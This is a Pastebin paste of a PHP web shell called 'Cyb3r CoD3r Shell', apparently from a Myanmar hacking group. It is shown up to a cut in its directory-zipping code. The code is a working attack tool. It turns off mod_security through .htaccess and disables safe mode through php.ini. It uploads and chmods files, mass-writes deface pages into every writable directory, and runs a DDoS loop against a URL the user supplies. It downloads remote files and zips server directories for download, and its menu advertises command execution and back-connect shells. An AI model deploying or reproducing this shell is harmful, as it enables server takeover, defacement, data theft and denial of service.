Cyb3rCoD3r

Cyb3r Coder Shell

Jan 18th, 2013
202
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 64.64 KB | None | 0 0
  1. <?php
  2. session_start();
  3. set_time_limit(0);
  4. error_reporting(0);
  5. if (get_magic_quotes_gpc()) {
  6. function stripslashes_deep($value) {
  7. $value = is_array($value) ?
  8. array_map('stripslashes_deep', $value) :
  9. stripslashes($value);
  10.  
  11. return $value;
  12. }
  13. $_POST = array_map('stripslashes_deep', $_POST);
  14. $_GET = array_map('stripslashes_deep', $_GET);
  15. $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
  16. $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
  17. }
  18. if($_GET['do']=="remove"){
  19. unlink(getcwd().$_SERVER["SCRIPT_NAME"]);
  20. }
  21. $basep=$_SERVER['DOCUMENT_ROOT'];
  22. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  23. $slash="\\";
  24. $basep=str_replace("/","\\",$basep);
  25. }else{
  26. $slash="/";
  27. $basep=str_replace("\\","/",$basep);
  28. }
  29. if($_GET['do']=="remove"){
  30. unlink(getcwd().$slash.$_SERVER["SCRIPT_NAME"]);
  31. }
  32. if ($_REQUEST['address']){
  33. if(is_readable($_REQUEST['address'])){
  34. chdir($_REQUEST['address']);}else{
  35. alert("Permission Denied !");}}
  36. $me=$_SERVER['PHP_SELF'];
  37. $formp="<form method=post action='".$me."'>";
  38. $formg="<form method=get action='".$me."'>";
  39. $nowaddress='<input type=hidden name=address value="'.getcwd().'">';
  40. if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
  41. if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"])){
  42. alert("File Upload Successful");
  43. }else{
  44. alert("Permission Denied !");
  45.  
  46. }
  47. }
  48. if(ini_get('disable_functions')){
  49. $disablef=ini_get('disable_functions');
  50. }else{
  51. $disablef="All Functions Enable";
  52. }
  53. if(ini_get('safe_mode')){
  54. $safe_modes="On";
  55. }else{
  56. $safe_modes="Off";
  57. }
  58. if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
  59. if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");}
  60. }
  61. $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
  62. $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
  63. $head='<style type="text/css">
  64. A:link {text-decoration: none}
  65. A:visited {text-decoration: none}
  66. A:active {text-decoration: none}
  67. A:hover {text-decoration: underline overline; color: 414141;}
  68. .focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
  69. </style><head>
  70. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  71. <title>Cyb3r CoD3r's Sh3ll (Myanmar Hackers Unit4m)</title>
  72. </head><body topmargin="0" leftmargin="0" rightmargin="0"
  73. bgcolor="#f2f2f2"><div align="center">
  74. &nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
  75. <tr>
  76. <td height="30" width="996">
  77. <p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=home">Home</a> -- <a href="?do=filemanager&address='.getcwd().'">File Manager</a> -- <a href="?do=cmd&address='.getcwd().'">Command Execute</a> -- <a href="?do=bc&address='.getcwd().'">Back Connect</a> --
  78. <a href="?do=bypasscmd&address='.getcwd().'">BypasS Command eXecute(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
  79. <a href="?do=bypassdir&address='.getcwd().'">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
  80. Eval Php</a> -- <a href="?do=db&address='.getcwd().'">Data Base</a> -- <a href="?do=convert&address='.getcwd().'">Convert</a> -- <a href="?do=mail&address='.getcwd().'">Mail Boomber</a><a href="?do=info&address='.getcwd().'">
  81. <br>Server Information</a> -- <a href="?do=d0slocal&address='.getcwd().'">Dos Local Server</a> -- <a href="?do=dump&address='.getcwd().'">Backup Database</a> -- <a href="?do=mass&address='.getcwd().'">Mass Deface</a> -- <a href="?do=dlfile&address='.getcwd().'">Download Remote File</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">Find Writable Directory</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
  82. </span></font></td></tr></table></div>
  83. <div align="center">
  84. <table id="table2" style="border-collapse: collapse; border-style:
  85. solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
  86. cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
  87. border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
  88. height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
  89. Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
  90. width="950" bgcolor="#e7e3de" height="10" valign="top">';
  91. $end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.myanmarcybercoder.co.cc/" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
  92. $deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
  93. function alert($text){
  94. echo "<script>alert('".$text."')</script>";
  95. }
  96. if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
  97. if(is_readable($_GET['address'].$_GET['filename'])){
  98. $opedit=fopen($_GET['address'].$_GET['filename'],"r");
  99. while(!feof($opedit))
  100. $data.=fread($opedit,9999);
  101. fclose($opedit);
  102. echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET['filename'].' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
  103. }else{alert("Permission Denied !");}}
  104. function sizee($size)
  105. {
  106. if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
  107. elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
  108. elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
  109. else {$size = $size . " B";}
  110. return $size;
  111. }
  112. if($_REQUEST['do']=='about'){
  113. echo $head."<p align='center'><b><font color=red>Myanmar Hackers Unite4m, Blink Hackers Gruop</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Recoded By : Cyb3r CoD3r(MHU)<br>Special Thanks(Đǿиgǿтн , hacker1989 , H_c0D3S , hlaminlay777 , Ooops , sp1rtr1d3r , ahak , Bug Lab , mr.n00b , Dr.Rat n All Myanmar Hackers N Defacers Crews)<br>Home Page : <a href='http://mmcyberdevils.com'>-:::{www.mmcyberdevils.com}:::-</a><br>Update Notice: <a href='http://www.kiddomonstar.com/?p=442'>Cyb3r CoD3r's Shell</a><br>Forum : <a href='http://www.mmhackforums.com'>My@nm@r H@ck f0rUm</a><br>
  114. <center>
  115. <PRE>
  116.  
  117.  
  118. @@ @@ @@ @@ @@ @@
  119. @@ @@ @@ @@ @@ @@ @@ @@
  120. @@ @@ @@ @@ @@ @@ @@
  121. @@ @@ @@ @@@@@ @@ @@ @@
  122. @@ @@ @@ @@ @@ @@
  123. @@ @@ @@ @@ @@ @@ @@ @@
  124. @@ @@ @@ @@ @@ @@ @@ @@
  125.  
  126. </PRE>
  127.  
  128.  
  129. ".$end;exit;
  130.  
  131. }
  132. function deleteDirectory($dir) {
  133. if (!file_exists($dir)) return true;
  134. if (!is_dir($dir) || is_link($dir)) return unlink($dir);
  135. foreach (scandir($dir) as $item) {
  136. if ($item == '.' || $item == '..') continue;
  137. if (!deleteDirectory($dir . "/" . $item)) {
  138. chmod($dir . "/" . $item, 0777);
  139. if (!deleteDirectory($dir . "/" . $item)) return false;
  140. };}return rmdir($dir);}
  141.  
  142. function download($fileadd,$finame){
  143. $dlfilea=$fileadd.$finame;
  144. header("Content-Disposition: attachment; filename=" . $finame);
  145. header("Content-Type: application/download");
  146. header("Content-Length: " . filesize($dlfilea));
  147. flush();
  148. $fp = fopen($$dlfilea, "r");
  149. while (!feof($fp))
  150. {
  151. echo fread($fp, 65536);
  152. flush();
  153. }
  154. fclose($fp);
  155. }
  156. if($_GET['do']=="rename"){
  157. echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
  158. }
  159.  
  160. if ($_GET['byapache']=='ofms'){
  161. $fse=fopen(getcwd().$slash.".htaccess","w");
  162. fwrite($fse,'<IfModule mod_security.c>
  163. Sec------Engine Off
  164. Sec------ScanPOST Off
  165. </IfModule>');
  166. fclose($fse);
  167. }elseif ($_GET['byapache']=='bysap'){
  168. $fse=fopen(getcwd().$slash.".htaccess","w");
  169. fwrite($fse,'Options +FollowSymLinks
  170. DirectoryIndex Persian-Gulf-For-Ever.html');
  171. fclose($fse);
  172. }elseif ($_GET['byapache']=='sfadf'){
  173. $fse=fopen(getcwd().$slash."php.ini","w");
  174. fwrite($fse,'safe_mode=OFF
  175. disable_functions=NONE');
  176. fclose($fse);
  177. }
  178. if($_GET['do']=="apache"){
  179. echo $head.$formg.$nowaddress.'<p align="center">
  180. <select name=byapache>
  181. <option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
  182. <option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
  183. </select><br><input type=submit value=eXecute></form></p>'.$end;exit;
  184. }
  185. if($_GET['do']=="dd0s"){
  186. echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
  187. }
  188.  
  189. if($_GET['urldd0'] && $_GET['timedd0']){
  190. for ($id=0;$$id<$_GET['timedd0'];$id++){
  191. $fp=null;
  192. $contents=null;
  193. $fp=fopen($_GET['urldd0'],"rb");
  194. while (!feof($fp)) {
  195. $contents .= fread($fp, 8192);
  196. }
  197. fclose($fp);
  198. }}
  199. if($_GET['do']=="dlfile"){
  200. echo $head.$formp.$nowaddress.'<p align="center">Download Remote File!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
  201. }
  202. function dirpe($addres){
  203. global $slash;
  204. $idd=0;
  205. if ($dirhen = @opendir($addres)) {
  206. while ($file = readdir($dirhen)) {
  207. $permdir=str_replace('//','/',$addres.$slash.$file);
  208. if($file!='.' && $file!='..' && is_dir($permdir)){
  209. if (is_writable($permdir)) {
  210. $dirdata[$idd]['filename']=$permdir;
  211. $idd++;
  212. }
  213. dirpe($permdir);
  214. }
  215. }
  216. closedir($dirhen);
  217. } else {
  218. return ("notperm");
  219. }
  220. if ($dirdata){
  221. return $dirdata;
  222. }else{
  223. return "notfound";
  224.  
  225. }
  226. }
  227. function dirpmass($addres,$massname,$masssource){
  228. global $slash;
  229. $idd=0;
  230. if ($dirhen = @opendir($addres)) {
  231. while ($file = readdir($dirhen)) {
  232. $permdir=str_replace('//','/',$addres.$slash.$file);
  233. if($file!='.' && $file!='..' && is_dir($permdir)){
  234. if (is_writable($permdir)) {
  235. if ($fm=fopen($permdir.$slash.$massname,"w")){
  236. fwrite($fm,$masssource);
  237. fclose($fm);
  238. $dirdata[$idd]['filename']=$permdir;
  239. }
  240.  
  241. $idd++;
  242. }
  243. dirpmass($permdir);
  244. }
  245. }
  246. closedir($dirhen);
  247. } else {
  248. return ("notperm");
  249. }
  250. if ($dirdata){
  251. return $dirdata;
  252. }else{
  253. return "notfound";
  254.  
  255. }
  256. }
  257. if($_GET['do']=="perm"){
  258. echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
  259. }
  260. if ($_POST['affw']){
  261. $arrfilelist=dirpe($_POST['affw']);
  262. if ($arrfilelist=='notfound'){
  263. alert("Not Found !");
  264. }elseif($arrfilelist=='notperm'){
  265. alert("Permission Denied !");
  266. }else{
  267. foreach ($arrfilelist as $tmpdir){
  268. if ($coi %2){
  269. $colort='"#e7e3de"';
  270. }else{
  271. $colort='"#e4e1de"';}
  272. $coi++;
  273. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  274. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  275. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  276. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  277. }
  278. echo $head.'
  279. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  280. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  281. </tr></table>'.$permdir.'</table>
  282. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  283. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  284. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  285. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  286. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  287. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  288. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  289. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  290. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  291. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  292. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  293. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  294. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  295. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  296. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  297. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  298. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  299. <font face="Tahoma" style="font-size: 10pt">
  300. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  301. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  302. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  303. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  304. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  305. <td width="200" align="right" valign="top">
  306. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  307. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  308. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  309. }}
  310. if($_GET['do']=="mass"){
  311. echo $head.$formp.'<p align="center">[Mass Deface]<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
  312. }
  313. if ($_POST['mffw']){
  314. $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssource']);
  315. if ($arrfilelist=='notfound'){
  316. alert("Not Found !");
  317. }elseif($arrfilelist=='notperm'){
  318. alert("Permission Denied !");
  319. }else{
  320. foreach ($arrfilelist as $tmpdir){
  321. if ($coi %2){
  322. $colort='"#e7e3de"';
  323. }else{
  324. $colort='"#e4e1de"';}
  325. $coi++;
  326. $permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  327. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir['filename'].'"><b>'.$tmpdir['filename'].'</b></span></td>
  328. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
  329. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
  330. }
  331. echo $head.'
  332. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  333. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  334. </tr></table>'.$permdir.'</table>
  335. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
  336. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  337. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
  338. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
  339. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  340. <font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---&gt; &nbsp;</td>
  341. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  342. <form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  343. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
  344. <input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
  345. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  346. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;File : </td>
  347. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  348. <font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
  349. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  350. <font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----&gt;</b> Dirctory Name </td>
  351. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  352. <font face="Tahoma" style="font-size: 10pt">
  353. <input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  354. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  355. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----&gt;</b> Name File </td>
  356. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  357. <font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
  358. <td width="200" align="right" valign="top">
  359. <font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----&gt;</b></b>&nbsp;&nbsp;File : </td>
  360. <td width="750"><font face="Tahoma" style="font-size: 10pt">
  361. <input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
  362. }}
  363. if($_POST['adlr'] && $_POST['adsr']){
  364. $url = $_POST['adlr'];
  365. $newfname = $_POST['adsr'] . basename($url);
  366. $file = fopen ($url, "rb");
  367. if ($file) {
  368. $newf = fopen ($newfname, "wb");
  369. if ($newf)
  370. while(!feof($file)) {
  371. fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  372. }
  373. alert("File Downloaded Success");
  374. }else{alert("Can Not Open File");}
  375. if ($file) {
  376. fclose($file);
  377. }
  378. if ($newf) {
  379. fclose($newf);
  380. }
  381. }
  382. if($_GET['do']=="down" and $_GET['type']=='file'){
  383. download($_GET['address'],$_GET['filename']);}
  384. if($_GET['do']=="down" and $_GET['type']=='dir'){
  385. class zipfile
  386. {
  387. var $datasec = array();
  388. var $ctrl_dir = array();
  389. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  390. var $old_offset = 0;
  391. function add_dir($name)
  392. {
  393. $name = str_replace("\\", "/", $name);
  394. $fr = "\x50\x4b\x03\x04";
  395. $fr .= "\x0a\x00";
  396. $fr .= "\x00\x00";
  397. $fr .= "\x00\x00";
  398. $fr .= "\x00\x00\x00\x00";
  399. $fr .= pack("V",0);
  400. $fr .= pack("V",0);
  401. $fr .= pack("V",0);
  402. $fr .= pack("v", strlen($name) );
  403. $fr .= pack("v", 0 );
  404. $fr .= $name;
  405. $fr .= pack("V",$crc);
  406. $fr .= pack("V",$c_len);
  407. $fr .= pack("V",$unc_len);
  408. $this -> datasec[] = $fr;
  409. $new_offset = strlen(implode("", $this->datasec));
  410. $cdrec = "\x50\x4b\x01\x02";
  411. $cdrec .="\x00\x00";
  412. $cdrec .="\x0a\x00";
  413. $cdrec .="\x00\x00";
  414. $cdrec .="\x00\x00";
  415. $cdrec .="\x00\x00\x00\x00";
  416. $cdrec .= pack("V",0);
  417. $cdrec .= pack("V",0);
  418. $cdrec .= pack("V",0);
  419. $cdrec .= pack("v", strlen($name) );
  420. $cdrec .= pack("v", 0 );
  421. $cdrec .= pack("v", 0 );
  422. $cdrec .= pack("v", 0 );
  423. $cdrec .= pack("v", 0 );
  424. $ext = "\x00\x00\x10\x00";
  425. $ext = "\xff\xff\xff\xff";
  426. $cdrec .= pack("V", 16 );
  427. $cdrec .= pack("V", $this -> old_offset );
  428. $this -> old_offset = $new_offset;
  429. $cdrec .= $name;
  430. $this -> ctrl_dir[] = $cdrec;
  431. }
  432. function add_file($data, $name)
  433. {
  434. $name = str_replace("\\", "/", $name);
  435. $fr = "\x50\x4b\x03\x04";
  436. $fr .= "\x14\x00";
  437. $fr .= "\x00\x00";
  438. $fr .= "\x08\x00";
  439. $fr .= "\x00\x00\x00\x00";
  440. $unc_len = strlen($data);
  441. $crc = crc32($data);
  442. $zdata = gzcompress($data);
  443. $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
  444. $c_len = strlen($zdata);
  445. $fr .= pack("V",$crc);
  446. $fr .= pack("V",$c_len);
  447. $fr .= pack("V",$unc_len);
  448. $fr .= pack("v", strlen($name) );
  449. $fr .= pack("v", 0 );
  450. $fr .= $name;
  451. $fr .= $zdata;
  452. $fr .= pack("V",$crc);
  453. $fr .= pack("V",$c_len);
  454. $fr .= pack("V",$unc_len);
  455. $this -> datasec[] = $fr;
  456. $new_offset = strlen(implode("", $this->datasec));
  457. $cdrec = "\x50\x4b\x01\x02";
  458. $cdrec .="\x00\x00";
  459. $cdrec .="\x14\x00";
  460. $cdrec .="\x00\x00";
  461. $cdrec .="\x08\x00";
  462. $cdrec .="\x00\x00\x00\x00";
  463. $cdrec .= pack("V",$crc);
  464. $cdrec .= pack("V",$c_len);
  465. $cdrec .= pack("V",$unc_len);
  466. $cdrec .= pack("v", strlen($name) );
  467. $cdrec .= pack("v", 0 );
  468. $cdrec .= pack("v", 0 );
  469. $cdrec .= pack("v", 0 );
  470. $cdrec .= pack("v", 0 );
  471. $cdrec .= pack("V", 32 );
  472. $cdrec .= pack("V", $this -> old_offset );
  473. $this -> old_offset = $new_offset;
  474. $cdrec .= $name;
  475. $this -> ctrl_dir[] = $cdrec;
  476. }
  477. function file() {
  478. $data = implode("", $this -> datasec);
  479. $ctrldir = implode("", $this -> ctrl_dir);
  480. return
  481. $data.
  482. $ctrldir.
  483. $this -> eof_ctrl_dir.
  484. pack("v", sizeof($this -> ctrl_dir)).
  485. pack("v", sizeof($this -> ctrl_dir)).
  486. pack("V", strlen($ctrldir)).
  487. pack("V", strlen($data)).
  488. "\x00\x00";
  489. }
  490. }
  491. $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash;
  492. $zipfile = new zipfile();
  493. function get_files_from_folder($directory, $put_into) {
  494. global $zipfile;
  495. if ($handle = opendir($directory)) {
  496. while (false !== ($file = readdir($handle))) {
  497. if (is_file($directory.$file)) {
  498. $fileContents = file_get_contents($directory.$file);
  499. $zipfile->add_file($fileContents, $put_into.$file);
  500. } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
  501. $zipfile->add_dir($put_into.$file.'/');
